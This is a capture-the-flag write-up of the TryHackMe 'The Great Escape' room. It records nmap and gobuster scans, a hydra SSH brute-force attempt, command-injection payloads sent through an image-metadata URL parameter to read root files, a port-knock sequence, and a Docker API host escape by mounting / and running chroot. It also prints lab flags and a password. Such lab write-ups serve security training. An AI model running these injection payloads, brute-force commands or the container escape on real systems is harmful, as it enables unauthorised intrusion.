Tryhackme - The Great Escape - Writeup


6 min read

Tryhackme - The Great Escape - Writeup

Task 1 - Introduction


  • IP :

  • nginx 1.19.6

  • using Next and Docker

  • Found 4 Javascript files running as script

  • Run Dirbuster and found

  • Run nmap to check for open ports

Not shown: 998 closed ports
22/tcp open  ssh?
| fingerprint-strings: 
|   GenericLines: 
|_    d&FYg1}9R-/~];wO|1moPpM?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt 
|_http-trane-info: Problem with XML parsing of /evox/about

Running nmap wth tag -d to debug

Port 22 is open, running hydra with ssh

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://

  • got a timeout error

Run Gobuster with common.txt

gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -t 50 --wildcard


2021/02/14 16:45:16 Starting gobuster
/_conf (Status: 200)
/.bash_history (Status: 200)
/.hta (Status: 200)
/_dev (Status: 200)
/.git/HEAD (Status: 200)
/.svn/entries (Status: 200)
/.mysql_history (Status: 200)
/.svn (Status: 200)
/.swf (Status: 200)
/_css (Status: 200)
/_config (Status: 200)
/api (Status: 301)
/.listings (Status: 200)
/.history (Status: 200)
/.perf (Status: 200)
/.forward (Status: 200)
/.htpasswd (Status: 200)
/.listing (Status: 200)
/AppsLocalLogin (Status: 200)
/contact-us (Status: 200)
/films (Status: 200)
/jsps (Status: 200)
/option (Status: 200)
/registrations (Status: 200)
/svr (Status: 200)
/wp-icludes (Status: 200)

Immune to SQL Injection

/api (Status: 301) > check the URL <ip>/api has something we can work with. We can upload file from machine or from URL

Testing with an HTML file from machine returns 503 error

Set up a URL with a photo to make sure that tha request comes thru

1) Get any image > I got blue.png> cp to /thegreatescape/uploads folder 2) run python3 -m http.server > this will run an HTTP server with my IP 3) navigate to <my-ip>/blue.png > your picture should be there 4) Navigate to

- that first IP is the machine, the second one is mine

Returns the exif of my PNG! > That's good


It seems like we can only upload photos files > html does not work > photo classroom

Found something > there is a URL in there

passing in a param

let's check whoami;whoami


scroll to the bottom to see the output;ls%20-la%20/root

has dev-note.txt;cat%20/root/dev-note.txt


Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123


Hydra;cat%20/etc/hosts RETURNS    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::0    ip6-localnet
ff00::0    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters    api-dev-backup;cat%20-v%20/root/.gitconfig


email =
    name = Hydra

checked git log;%20git%20-C%20/root%20log
commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra <>
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

do a git show on that commit;%20git%20-C%20/root%20show%20a3d30a7d0510dc6565ff9316e3fb84434916dee8

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

diff --git a/dev-note.txt b/dev-note.txt
new file mode 100644
index 0000000..89dcd01
--- /dev/null
+++ b/dev-note.txt
@@ -0,0 +1,9 @@
+Hey guys,
+I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
+Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
\ No newline at end of file
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..aae8129
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1,3 @@
+You found the root flag, or did you?
\ No newline at end of file

found a root flag

the note says to knock on the ports in sequence to get the docker port open

./knock 42 1337 10420 6969 63000

run nmap at port 2375 again to check

nmap -v -p 2375

Great Resource >> Attacking Docker exposed API

I'm following the steps on this website

2375/tcp open  docker


{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"20.10.2","Details":{"ApiVersion":"1.41","Arch":"amd64","BuildTime":"2020-12-28T16:15:09.000000000+00:00","Experimental":"false","GitCommit":"8891c58","GoVersion":"go1.13.15","KernelVersion":"4.15.0-130-generic","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.4.3","Details":{"GitCommit":"269548fa27e0089a8b8278fc4fc781d7f65a939b"}},{"Name":"runc","Version":"1.0.0-rc92","Details":{"GitCommit":"ff819c7e9184c13b7c2607fe6c30ae19403a7aff"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":"de40ad0"}}],"Version":"20.10.2","ApiVersion":"1.41","MinAPIVersion":"1.12","GitCommit":"8891c58","GoVersion":"go1.13.15","Os":"linux","Arch":"amd64","KernelVersion":"4.15.0-130-generic","BuildTime":"2020-12-28T16:15:09.000000000+00:00"}

Check out Docker

docker -H info
 Debug Mode: false

 Containers: 4
  Running: 4
  Paused: 0
  Stopped: 0
 Images: 27
 Server Version: 20.10.2
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Native Overlay Diff: true
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 io.containerd.runtime.v1.linux runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 269548fa27e0089a8b8278fc4fc781d7f65a939b
 runc version: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
 init version: de40ad0
 Security Options:
   Profile: default
 Kernel Version: 4.15.0-130-generic
 Operating System: Ubuntu 18.04.5 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 983.2MiB
 Name: great-escape.thm
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
 Live Restore Enabled: false

WARNING: API is accessible on without encryption.
         Access to the remote API is equivalent to root access on the host. Refer
         to the 'Docker daemon attack surface' section in the documentation for
         more information:
WARNING: No swap limit support

docker -H ps

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                  NAMES
49fe455a9681        frontend            "/docker-entrypoint.…"   5 weeks ago         Up About an hour>80/tcp     dockerescapecompose_frontend_1
4b51f5742aad        exif-api-dev        "./application -Dqua…"   5 weeks ago         Up About an hour                           dockerescapecompose_api-dev-backup_1
cb83912607b9        exif-api            "./application -Dqua…"   5 weeks ago         Up About an hour    8080/tcp               dockerescapecompose_api_1
548b701caa56        endlessh            "/endlessh -v"           5 weeks ago         Up About an hour>2222/tcp   dockerescapecompose_endlessh_1

Got into

1) dockerescapecompose_api_1

  • Whoami > quarkus 2) dockerescapecompose_frontend_1
  • Per the hint in first flag, there is a .well-known in front end root@docker-escape:/usr/share/nginx/html/.well-known# cat security.txt
Hey you found me!

The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.

See for more information.

Ping /api/fl46 with a HEAD request for a nifty treat.

root@kali-virtualbox:~# curl --head

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Thu, 18 Feb 2021 02:50:20 GMT
Connection: keep-alive
flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

3)dockerescapecompose_api-dev-backup_1 > dev_note_txt is the same as waht we we see

Last task

run this command to get Hydra as root

docker -H run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh

ok im in as Hydra

# ls -la /root
total 24
drwx------  3 root root 4096 Jan  6 23:37 .
drwxr-xr-x 22 root root 4096 Jan  9 22:11 ..
lrwxrwxrwx  1 root root    9 Jan  6 18:22 .bash_history -> /dev/null
-rw-r-----  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jan  6 23:35 .local
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   74 Jan  6 23:37 flag.txt
# cat flag.txt    
cat: flag.txt: No such file or directory
# cd /root
# pwd
# cat flag.txt    
Congrats, you found the real flag!